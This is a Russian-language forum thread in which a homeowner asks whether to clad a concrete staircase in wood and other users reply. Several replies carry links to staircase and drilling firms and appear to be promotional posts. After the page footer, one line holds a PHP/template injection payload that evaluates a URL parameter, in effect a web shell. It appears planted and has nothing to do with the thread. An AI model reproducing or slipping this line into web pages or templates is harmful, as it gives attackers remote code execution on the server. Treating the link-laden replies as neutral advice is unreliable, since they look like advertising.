+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 12

Тема: Лестница


  1. #1
    Мимо проходил Bimbom is on a distinguished road Аватар для Bimbom
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    .....
    Сообщений
    45

    Лестница

    Купил в прошлом году недостроенный двухэтажный дом в Москве. Сейчас уже полностью достроил его и занимаюсь внутренней отделкой. На второй этаж ведет бетонная лестница, и мне она кажется очень не уютной, может стоит обшить ее деревом, как считаете?

  2. #2
    Мимо проходил nekrolog is on a distinguished road Аватар для nekrolog
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    54
    Мне кажется, идея довольно неплохая, отделка натуральным деревом привносит в интерьер особую теплоту и уют, и можно так обшить бетонную лестницу деревом что она сразу станет интереснейшим предметом дизайна. Кстати, вот здесь можно посмотреть расценки в Москве на данную услугу https://lestnica100.ru/catalog/oblic...etonyh-lestnic

  3. #3
    Мимо проходил Arsenal is on a distinguished road Аватар для Arsenal
    Регистрация
    12.02.2019
    Откуда
    ......
    Машина
    ...
    Сообщений
    37
    А я бы оставил бетонную лестницу такой как есть. Я вообще люблю холодные тона в интерьере и сочетание стекла с бетоном.

  4. #4
    Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Регистрация
    26.01.2019
    Откуда
    .....
    Машина
    .....
    Сообщений
    66
    А почему вы не захотели сделать полностью деревянную лестницу? Зачем ставили бетонную? У нас 3 этажа и лестница выполнена из дуба. Это что-то невероятное, хорошо что я когда заказывал проект оговорил заранее что хочу деревянную лестницу.

  5. #5
    Мимо проходил fionis is on a distinguished road Аватар для fionis
    Регистрация
    30.11.2018
    Машина
    Гольф
    Сообщений
    49
    Для отделки бетонной лестницы я бы тоже выбрал дерево - дуб, ясень, тиса, лиственница. А перила я бы заказал кованные, они лучше всего будут смотреться с деревом и впишутся практически в любой интерьер. Единственная проблема, которая может возникнуть - это монтаж лестничного ограждения. Для этого вам понадобится установка алмазного бурения https://generaltool.ru/catalog/ustan...nogo_bureniya/. Дело в том, что алмазное бурение позволяет быстро сделать отверстия в бетоне без лишней вибрации и шума. Обычными сверлами это делать неэффективно, это я уже на своем опыте знаю, поэтому сразу предостерегаю

  6. #6
    GTI-Racing Kurdt is on a distinguished road Аватар для Kurdt
    Регистрация
    17.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    473
    Спасибо

  7. #7
    Мимо проходил ViktorKirichev is on a distinguished road Аватар для ViktorKirichev
    Регистрация
    26.01.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    25
    У меня деревянная лестница и всё очень даже уютно

  8. #8
    Мимо проходил Leha-Leshiy is on a distinguished road Аватар для Leha-Leshiy
    Регистрация
    21.02.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    22
    На мой взгляд бетонную ставить в дом как-то странно, если честно. Что угодно, но только не бетон

  9. #9
    Мимо проходил ViktorKirichev is on a distinguished road Аватар для ViktorKirichev
    Регистрация
    26.01.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    25
    Цитата Сообщение от ViktorKirichev Посмотреть сообщение
    У меня деревянная лестница и всё очень даже уютно
    Кстати, ставили ступени из дуба http://stamwood.ru/catalog/stupeni_iz_duba/. Удобно. На вид лестница чудесная и придаёт элемент роскоши. Я думаю, что вам именно такое и хотелось бы. Могу и ошибаться, конечно, но советую. Со стороны выглядит красиво и подниматся/спускаться по ней одно удовольствие. Если в доме стоит лестница, то именно она первой в глаза и бросается - все, кто не приходил, так говорят. Важно, что б она соответствовала по всем статьям

  10. #10
    Новичок Drughok is on a distinguished road Аватар для Drughok
    Регистрация
    21.10.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    103
    Не знаю, все зависит о т того какой будет интерьер. Я себе заказывал новую межэтажную деревянную лестницу вот у этой фирмы http://www.lestniza.ru. Занимает они немного места и смотрится классно, так что может вообще её поменять?

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}